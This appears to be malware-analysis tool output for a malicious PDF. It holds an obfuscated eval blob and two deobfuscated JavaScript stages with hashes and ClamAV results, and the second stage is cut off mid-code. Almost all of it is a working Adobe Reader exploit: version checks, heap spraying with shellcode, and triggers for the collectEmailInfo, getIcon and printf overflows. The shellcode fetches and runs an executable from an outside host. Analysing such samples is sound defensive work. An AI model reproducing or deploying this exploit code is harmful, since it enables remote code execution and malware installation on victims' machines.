c1JTYzJTU5JTc2JTRiJTUyJTUxJTMyJTIwJTJkJTIwJTI4JTUwJTU0JTZhJTcyJTM3JTU1JTZlJTdhJTc0JTM1JTIwJTJiJTIwJTMwJTc4JTMzJTM4JTI5JTNiJTIwJTIwJTIwJTIwJTc2JTYxJTcyJTIwJTQxJTc0JTdhJTY5JTYyJTcxJTU0JTdhJTU4JTU4JTIwJTNkJTIwJTc1JTZlJTY1JTczJTYzJTYxJTcwJTY1JTI4JTIyJTI1JTc1JTM5JTMwJTM5JTMwJTI1JTc1JTM5JTMwJTM5JTMwJTIyJTI5JTNiJTIwJTIwJTIwJTIwJTQxJTc0JTdhJTY5JTYyJTcxJTU0JTdhJTU4JTU4JTIwJTNkJTIwJTRhJTRjJTc4JTY3JTQ3JTMxJTQ3JTZmJTQ0JTc2JTI4JTQxJTc0JTdhJTY5JTYyJTcxJTU0JTdhJTU4JTU4JTJjJTIwJTQyJTU5JTVhJTM0JTc4JTQ3JTY1JTRhJTUwJTY4JTI5JTNiJTIwJTIwJTIwJTIwJTc2JTYxJTcyJTIwJTRkJTMyJTRlJTZkJTQxJTY1JTM5JTY0JTc3JTYzJTIwJTNkJTIwJTI4JTQ2JTY4JTc5JTYzJTZjJTc3JTc0JTUwJTQ3JTRhJTIwJTJkJTIwJTMwJTc4JTM0JTMwJTMwJTMwJTMwJTMwJTI5JTIwJTJmJTIwJTc0JTU3JTc1JTYzJTU5JTc2JTRiJTUyJTUxJTMyJTNiJTIwJTIwJTIwJTIwJTY2JTZmJTcyJTI4JTc2JTYxJTcyJTIwJTU2JTUyJTM5JTMwJTM0JTY4JTM1JTRmJTMwJTU2JTIwJTNkJTIwJTMwJTNiJTIwJTU2JTUyJTM5JTMwJTM0JTY4JTM1JTRmJTMwJTU2JTIwJTNjJTIwJTRkJTMyJTRlJTZkJTQxJTY1JTM5JTY0JTc3JTYzJTNiJTIwJTU2JTUyJTM5JTMwJTM0JTY4JTM1JTRmJTMwJTU2JTJiJTJiJTI5JTIwJTIwJTIwJTIwJTdiJTIwJTIwJTIwJTIwJTIwJTIwJTQxJTM1JTU4JTY5JTcxJTZjJTRlJTY4JTM1JTMxJTViJTU2JTUyJTM5JTMwJTM0JTY4JTM1JTRmJTMwJTU2JTVkJTIwJTNkJTIwJTQxJTc0JTdhJTY5JTYyJTcxJTU0JTdhJTU4JTU4JTIwJTJiJTIwJTYxJTQ5JTU1JTMwJTQ4JTRjJTU0JTQ4JTU0JTYyJTNiJTIwJTIwJTIwJTIwJTdkJTIwJTIwJTdkJTIwIikpOyAgbGF2ZSh1bmVzY2FwZSgiJTIwJTIwJTY2JTc1JTZlJTYzJTc0JTY5JTZmJTZlJTIwJTZlJTMyJTc5JTMwJTczJTM2JTY0JTY3JTM1JTU4JTI4JTI5JTIwJTIwJTdiJTIwJTIwJTIwJTIwJTc2JTYxJTcyJTIwJTc2JTRlJTU5JTM4JTQxJTZhJTZkJTQ5JTRlJTZhJTIwJTNkJTIwJTMwJTNiJTIwJTIwJTIwJTIwJTc2JTYxJTcyJTIwJTUyJTYzJTQyJTM0JTZjJTQ2JTZiJTcxJTY0JTc1JTIwJTNkJTIwJTYxJTcwJTcwJTJlJTc2JTY5JTY1JTc3JTY1JTcyJTU2JTY1JTcyJTczJTY5JTZmJTZlJTJlJTc0JTZmJTUzJTc0JTcyJTY5JTZlJTY3JTI4JTI5JTNiJTIwJTIwJTIwJTIwJTYxJTcwJTcwJTJlJTYzJTZjJTY1JTYxJTcyJTU0JTY5JTZkJTY1JTRmJTc1JTc0JTI4JTZlJTMyJTM0JTUwJTY4JTYxJTRjJTM5JTM0JTY5JTI5JTNiJTIwJTIwJTIwJTIwJTY5JTY2JTI4JTI4JTUyJTYzJTQyJTM0JTZjJTQ2JTZiJTcxJTY0JTc1JTIwJTNlJTNkJTIwJTM4JTIwJTI2JTI2JTIwJTUyJTYzJTQyJTM0JTZjJTQ2JTZiJTcxJTY0JTc1JTIwJTNjJTIwJTM4JTJlJTMxJTMwJTMyJTI5JTIwJTdjJTdjJTIwJTUyJTYzJTQyJTM0JTZjJTQ2JTZiJTcxJTY0JTc1JTIwJTNjJTIwJTM3JTJlJTMxJTI5JTIwJTIwJTIwJTIwJTdiJTIwJTIwJTIwJTIwJTIwJTIwJTQzJTQyJTMzJTdhJTcyJTRhJTdhJTM4JTM5JTQ0JTI4JTMwJTI5JTNiJTIwJTIwJTIwJTIwJTIwJTIwJTc2JTYxJTcyJTIwJTU0JTMzJTc2JTRiJTQyJTZmJTUwJTcwJTU1JTU1JTIwJTNkJTIwJTc1JTZlJTY1JTczJTYzJTYxJTcwJTY1JTI4JTIyJTI1JTc1JTMwJTYzJTMwJTYzJTI1JTc1JTMwJTYzJTMwJTYzJTIyJTI5JTNiJTIwJTIwJTIwJTIwJTIwJTIwJTc3JTY4JTY5JTZjJTY1JTI4JTU0JTMzJTc2JTRiJTQyJTZmJTUwJTcwJTU1JTU1JTJlJTZjJTY1JTZlJTY3JTc0JTY4JTIwJTNjJTIwJTM0JTM0JTM5JTM1JTMyJTI5JTIwJTU0JTMzJTc2JTRiJTQyJTZmJTUwJTcwJTU1JTU1JTIwJTJiJTNkJTIwJTU0JTMzJTc2JTRiJTQyJTZmJTUwJTcwJTU1JTU1JTNiJTIwJTIwJTIwJTIwJTIwJTIwJTc2JTYxJTcyJTIwJTc1JTQ2JTcyJTc2JTRlJTMyJTY2JTQxJTRiJTM0JTIwJTNkJTIwJTc0JTY4JTY5JTczJTNiJTIwJTIwJTIwJTIwJTIwJTIwJTc2JTYxJTcyJTIwJTc4JTQ2JTY2JTM2JTQ5JTUyJTRiJTM0JTQ4JTc4JTIwJTNkJTIwJTQzJTZmJTZjJTZjJTYxJTYyJTNiJTIwJTIwJTIwJTIwJTIwJTIwJTc1JTQ2JTcyJTc2JTRlJTMyJTY2JTQxJTRiJTM0JTViJTIyJTYzJTZmJTZjJTZjJTYxJTYyJTUzJTc0JTZmJTcyJTY1JTIyJTVkJTIwJTNkJTIwJTc4JTQ2JTY2JTM2JTQ5JTUyJTRiJTM0JTQ4JTc4JTViJTIyJTYzJTZmJTZjJTZjJTY1JTYzJTc0JTQ1JTZkJTYxJTY5JTZjJTQ5JTZlJTY2JTZmJTIyJTVkJTI4JTIwJTIwJTIwJTIwJTIwJTIwJTdiJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTczJTc1JTYyJTZhJTIwJTNhJTIwJTIyJTIyJTJjJTIwJTZkJTczJTY3JTIwJTNhJTIwJTU0JTMzJTc2JTRiJTQyJTZmJTUwJTcwJTU1JTU1JTIwJTIwJTIwJTIwJTIwJTIwJTdkJTIwJTIwJTIwJTIwJTIwJTIwJTI5JTNiJTIwJTIwJTIwJTIwJTdkJTIwJTIwJTIwJTIwJTY5JTY2JTI4JTI4JTUyJTYzJTQyJTM0JTZjJTQ2JTZiJTcxJTY0JTc1JTIwJTNlJTNkJTIwJTM4JTJlJTMxJTMwJTMyJTIwJTI2JTI2JTIwJTUyJTYzJTQyJTM0JTZjJTQ2JTZiJTcxJTY0JTc1JTIwJTNjJTIwJTM4JTJlJTMxJTMwJTM0JTI5JTIwJTdjJTdjJTIwJTI4JTUyJTYzJTQyJTM0JTZjJTQ2JTZiJTcxJTY0JTc1JTIwJTNlJTNkJTIwJTM5JTIwJTI2JTI2JTIwJTUyJTYzJTQyJTM0JTZjJTQ2JTZiJTcxJTY0JTc1JTIwJTNjJTIwJTM5JTJlJTMxJTI5JTIwJTdjJTdjJTIwJTUyJTYzJTQyJTM0JTZjJTQ2JTZiJTcxJTY0JTc1JTIwJTNjJTNkJTIwJTM3JTJlJTMxJTMwJTMxJTI5JTIwJTIwJTIwJTIwJTdiJTIwJTIwJTIwJTIwJTIwJTIwJTc0JTcyJTc5JTIwJTIwJTIwJTIwJTIwJTIwJTdiJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTY5JTY2JTI4JTYxJTcwJTcwJTJlJTY0JTZmJTYzJTJlJTQzJTZmJTZjJTZjJTYxJTYyJTJlJTY3JTY1JTc0JTQ5JTYzJTZmJTZlJTI5JTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTdiJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTQzJTQyJTMzJTdhJTcyJTRhJTdhJTM4JTM5JTQ0JTI4JTMyJTI5JTNiJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTc2JTYxJTcyJTIwJTczJTY0JTMxJTczJTc4JTQzJTY3JTRkJTMzJTQyJTIwJTNkJTIwJTc1JTZlJTY1JTczJTYzJTYxJTcwJTY1JTI4JTIyJTI1JTMwJTM5JTIyJTI5JTNiJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTc3JTY4JTY5JTZjJTY1JTI4JTczJTY0JTMxJTczJTc4JTQzJTY3JTRkJTMzJTQyJTJlJTZjJTY1JTZlJTY3JTc0JTY4JTIwJTNjJTIwJTMwJTc4JTM0JTMwJTMwJTMwJTI5JTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTdiJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTczJTY0JTMxJTczJTc4JTQzJTY3JTRkJTMzJTQyJTIwJTJiJTNkJTIwJTczJTY0JTMxJTczJTc4JTQzJTY3JTRkJTMzJTQyJTNiJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTdkJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTczJTY0JTMxJTczJTc4JTQzJTY3JTRkJTMzJTQyJTIwJTNkJTIwJTIyJTRlJTJlJTIyJTIwJTJiJTIwJTczJTY0JTMxJTczJTc4JTQzJTY3JTRkJTMzJTQyJTNiJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTc2JTYxJTcyJTIwJTQ0JTUwJTUxJTY5JTRjJTZlJTZhJTMyJTc4JTM0JTIwJTNkJTIwJTYxJTcwJTcwJTNiJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTQ0JTUwJTUxJTY5JTRjJTZlJTZhJTMyJTc4JTM0JTViJTIyJTY0JTZmJTYzJTIyJTVkJTViJTIyJTQzJTZmJTZjJTZjJTYxJTYyJTIyJTVkJTViJTIyJTY3JTY1JTc0JTQ5JTYzJTZmJTZlJTIyJTVkJTI4JTczJTY0JTMxJTczJTc4JTQzJTY3JTRkJTMzJTQyJTI5JTNiJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTc2JTRlJTU5JTM4JTQxJTZhJTZkJTQ5JTRlJTZhJTIwJTNkJTIwJTMxJTNiJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTdkJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTY1JTZjJTczJTY1JTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTdiJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTc2JTRlJTU5JTM4JTQxJTZhJTZkJTQ5JTRlJTZhJTIwJTNkJTIwJTMxJTNiJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTdkJTIwJTIwJTIwJTIwJTIwJTIwJTdkJTIwJTIwJTIwJTIwJTIwJTIwJTYzJTYxJTc0JTYzJTY4JTI4JTY1JTI5JTIwJTIwJTIwJTIwJTIwJTIwJTdiJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTc2JTRlJTU5JTM4JTQxJTZhJTZkJTQ5JTRlJTZhJTIwJTNkJTIwJTMxJTNiJTIwJTIwJTIwJTIwJTIwJTIwJTdkJTIwJTIwJTIwJTIwJTIwJTIwJTY5JTY2JTI4JTc2JTRlJTU5JTM4JTQxJTZhJTZkJTQ5JTRlJTZhJTIwJTNkJTNkJTIwJTMxJTI5JTIwJTIwJTIwJTIwJTIwJTIwJTdiJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTY5JTY2JTI4JTUyJTYzJTQyJTM0JTZjJTQ2JTZiJTcxJTY0JTc1JTIwJTNkJTNkJTIwJTM4JTJlJTMxJTMwJTMyJTIwJTdjJTdjJTIwJTUyJTYzJTQyJTM0JTZjJTQ2JTZiJTcxJTY0JTc1JTIwJTNkJTNkJTIwJTM3JTJlJTMxJTI5JTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTdiJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTQzJTQyJTMzJTdhJTcyJTRhJTdhJTM4JTM5JTQ0JTI4JTMxJTI5JTNiJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTc2JTYxJTcyJTIwJTRkJTcyJTRhJTZiJTc3JTYyJTQyJTQ3JTY2JTU0JTIwJTNkJTIwJTIyJTMxJTMyJTM5JTM5JTM5JTM5JTM5JTM5JTM5JTM5JTM5JTM5JTM5JTM5JTM5JTM5JTM5JTM5JTM5JTM5JTIyJTNiJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTY2JTZmJTcyJTI4JTU0JTYzJTM3JTQ2JTU2JTM1JTUyJTQzJTUxJTU0JTIwJTNkJTIwJTMwJTNiJTIwJTU0JTYzJTM3JTQ2JTU2JTM1JTUyJTQzJTUxJTU0JTIwJTNjJTIwJTMyJTM3JTM2JTNiJTIwJTU0JTYzJTM3JTQ2JTU2JTM1JTUyJTQzJTUxJTU0JTJiJTJiJTI5JTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTdiJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTRkJTcyJTRhJTZiJTc3JTYyJTQyJTQ3JTY2JTU0JTIwJTJiJTNkJTIwJTIyJTM4JTIyJTNiJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTdkJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTc2JTYxJTcyJTIwJTZmJTQ4JTc0JTZmJTdhJTQ1JTYyJTY5JTQ2JTVhJTIwJTNkJTIwJTc1JTc0JTY5JTZjJTNiJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTZmJTQ4JTc0JTZmJTdhJTQ1JTYyJTY5JTQ2JTVhJTViJTIyJTcwJTcyJTY5JTZlJTc0JTY2JTIyJTVkJTI4JTIyJTI1JTM0JTM1JTMwJTMwJTMwJTY2JTIyJTJjJTIwJTRkJTcyJTRhJTZiJTc3JTYyJTQyJTQ3JTY2JTU0JTI5JTNiJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTdkJTIwJTIwJTIwJTIwJTIwJTIwJTdkJTIwJTIwJTIwJTIwJTdkJTIwJTdkJTIwIikpOyAKIGFwcC5tS1I3NU5oR2VNID0gbjJ5MHM2ZGc1WDsKIG4yNFBoYUw5NGkgPSBhcHAuc2V0VGltZU91dCgiYXBwLm1LUjc1TmhHZU0oKSIsIDEpOwo=");
var sssddd = eval;
sssddd(aasd);
generic_stage_recovery_000.js deobfuscated-js generic stage recovery percent-decode from JavaScript object 9 at offset 0xD6 5158 bytes
SHA-256: 0b067bc903b63a242391a278b374fe767746228f2b2a1ec2557ccf2ca832be05
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 10 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var A5XiqlNh51 = new Array();
 var n24PhaL94i;
 var lave = eval;
  lave(unescape("  function JLxgG1GoDv(AtzibqTzXX, BYZ4xGeJPh)  {    while(AtzibqTzXX.length * 2 < BYZ4xGeJPh)    {      AtzibqTzXX += AtzibqTzXX;    }    AtzibqTzXX = AtzibqTzXX.substring(0, BYZ4xGeJPh / 2);    return AtzibqTzXX;  } "));  lave(unescape("   function CB3zrJz89D(CI732isVhQ)  {    if(CI732isVhQ == 0)    {      var FhyclwtPGJ = 0x0c0c0c0c;      var aIU0HLTHTb =  unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u702F%u6972%u6576%u3374%u632E%u2F6E%u796D%u7865%u3270%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u7865%u0070");    }    else if(CI732isVhQ == 1)    {      FhyclwtPGJ = 0x30303030;      var aIU0HLTHTb =  unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u702F%u6972%u6576%u3374%u632E%u2F6E%u796D%u7865%u3270%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u7865%u0070");    }    else if(CI732isVhQ == 2)    {      var aIU0HLTHTb =  unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u702F%u6972%u6576%u3374%u632E%u2F6E%u796D%u7865%u3270%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u7865%u0070");    }    var tWucYvKRQ2 = 0x400000;    var PTjr7Unzt5 = aIU0HLTHTb.length * 2;    var BYZ4xGeJPh = tWucYvKRQ2 - (PTjr7Unzt5 + 0x38);    var AtzibqTzXX = unescape("%u9090%u9090");    AtzibqTzXX = JLxgG1GoDv(AtzibqTzXX, BYZ4xGeJPh);    var M2NmAe9dwc = (FhyclwtPGJ - 0x400000) / tWucYvKRQ2;    for(var VR904h5O0V = 0; VR904h5O0V < M2NmAe9dwc; VR904h5O0V++)    {      A5XiqlNh51[VR904h5O0V] = AtzibqTzXX + aIU0HLTHTb;    }  } "));  lave(unescape("  function n2y0s6dg5X()  {    var vNY8AjmINj = 0;    var RcB4lFkqdu = app.viewerVersion.toString();    app.clearTimeOut(n24PhaL94i);    if((RcB4lFkqdu >= 8 && RcB4lFkqdu < 8.102) || RcB4lFkqdu < 7.1)    {      CB3zrJz89D(0);      var T3vKBoPpUU = unescape("%u0c0c%u0c0c");      while(T3vKBoPpUU.length < 44952) T3vKBoPpUU += T3vKBoPpUU;      var uFrvN2fAK4 = this;      var xFf6IRK4Hx = Collab;      uFrvN2fAK4["collabStore"] = xFf6IRK4Hx["collectEmailInfo"](      {        subj : "", msg : T3vKBoPpUU      }      );    }    if((RcB4lFkqdu >= 8.102 && RcB4lFkqdu < 8.104) || (RcB4lFkqdu >= 9 && RcB4lFkqdu < 9.1) || RcB4lFkqdu <= 7.101)    {      try      {        if(app.doc.Collab.getIcon)        {          CB3zrJz89D(2);          var sd1sxCgM3B = unescape("%09");          while(sd1sxCgM3B.length < 0x4000)          {            sd1sxCgM3B += sd1sxCgM3B;          }          sd1sxCgM3B = "N." + sd1sxCgM3B;          var DPQiLnj2x4 = app;          DPQiLnj2x4["doc"]["Collab"]["getIcon"](sd1sxCgM3B);          vNY8AjmINj = 1;        }        else        {          vNY8AjmINj = 1;        }      }      catch(e)      {        vNY8AjmINj = 1;      }      if(vNY8AjmINj == 1)      {        if(RcB4lFkqdu == 8.102 || RcB4lFkqdu == 7.1)        {          CB3zrJz89D(1);          var MrJkwbBGfT = "12999999999999999999";          for(Tc7FV5RCQT = 0; Tc7FV5RCQT < 276; Tc7FV5RCQT++)          {            MrJkwbBGfT += "8";          }          var oHtozEbiFZ = util;          oHtozEbiFZ["printf"]("%45000f", MrJkwbBGfT);        }      }    } } ")); 
 app.mKR75NhGeM = n2y0s6dg5X;
 n24PhaL94i = app.setTimeOut("app.mKR75NhGeM()", 1);
generic_stage_recovery_001.js deobfuscated-js generic stage recovery percent-decode -> percent-decode from JavaScript object 9 at offset 0xD6 5154 bytes
SHA-256: 37f0e46d68b930fe911babae532f158782331ad272aa2047a2082e10917e7b8a
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 10 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var A5XiqlNh51 = new Array();
 var n24PhaL94i;
 var lave = eval;
  lave(unescape("  function JLxgG1GoDv(AtzibqTzXX, BYZ4xGeJPh)  {    while(AtzibqTzXX.length * 2 < BYZ4xGeJPh)    {      AtzibqTzXX += AtzibqTzXX;    }    AtzibqTzXX = AtzibqTzXX.substring(0, BYZ4xGeJPh / 2);    return AtzibqTzXX;  } "));  lave(unescape("   function CB3zrJz89D(CI732isVhQ)  {    if(CI732isVhQ == 0)    {      var FhyclwtPGJ = 0x0c0c0c0c;      var aIU0HLTHTb =  unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u702F%u6972%u6576%u3374%u632E%u2F6E%u796D%u7865%u3270%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u7865%u0070");    }    else if(CI732isVhQ == 1)    {      FhyclwtPGJ = 0x30303030;      var aIU0HLTHTb =  unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u702F%u6972%u6576%u3374%u632E%u2F6E%u796D%u7865%u3270%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u7865%u0070");    }    else if(CI732isVhQ == 2)    {      var aIU0HLTHTb =  unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u702F%u6972%u6576%u3374%u632E%u2F6E%u796D%u7865%u3270%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u7865%u0070");    }    var tWucYvKRQ2 = 0x400000;    var PTjr7Unzt5 = aIU0HLTHTb.length * 2;    var BYZ4xGeJPh = tWucYvKRQ2 - (PTjr7Unzt5 + 0x38);    var AtzibqTzXX = unescape("%u9090%u9090");    AtzibqTzXX = JLxgG1GoDv(AtzibqTzXX, BYZ4xGeJPh);    var M2NmAe9dwc = (FhyclwtPGJ - 0x400000) / tWucYvKRQ2;    for(var VR904h5O0V = 0; VR904h5O0V < M2NmAe9dwc; VR904h5O0V++)    {      A5XiqlNh51[VR904h5O0V] = AtzibqTzXX + aIU0HLTHTb;    }  } "));  lave(unescape("  function n2y0s6dg5X()  {    var vNY8AjmINj = 0;    var RcB4lFkqdu = app.viewerVersion.toString();    app.clearTimeOut(n24PhaL94i);    if((RcB4lFkqdu >= 8 && RcB4lFkqdu < 8.102) || RcB4lFkqdu < 7.1)    {      CB3zrJz89D(0);      var T3vKBoPpUU = unescape("%u0c0c%u0c0c");      while(T3vKBoPpUU.length < 44952) T3vKBoPpUU += T3vKBoPpUU;      var uFrvN2fAK4 = this;      var xFf6IRK4Hx = Collab;      uFrvN2fAK4["collabStore"] = xFf6IRK4Hx["collectEmailInfo"](      {        subj : "", msg : T3vKBoPpUU      }      );    }    if((RcB4lFkqdu >= 8.102 && RcB4lFkqdu < 8.104) || (RcB4lFkqdu >= 9 && RcB4lFkqdu < 9.1) || RcB4lFkqdu <= 7.101)    {      try      {        if(app.doc.Collab.getIcon)        {          CB3zrJz89D(2);          var sd1sxCgM3B = unescape("	");          while(sd1sxCgM3B.length < 0x4000)          {            sd1sxCgM3B += sd1sxCgM3B;          }          sd1sxCgM3B = "N." + sd1sxCgM3B;          var DPQiLnj2x4 = app;          DPQiLnj2x4["doc"]["Collab"]["getIcon"](sd1sxCgM3B);          vNY8AjmINj = 1;        }        else        {          vNY8AjmINj = 1;        }      }      catch(e)      {        vNY8AjmINj = 1;      }      if(vNY8AjmINj == 1)      {        if(RcB4lFkqdu == 8.102 || RcB4lFkqdu == 7.1)        {          CB3zrJz89D(1);          var MrJkwbBGfT = "12999999999999999999";          for(Tc7FV5RCQT = 0; Tc7FV5RCQT < 276; Tc7FV5RCQT++)          {            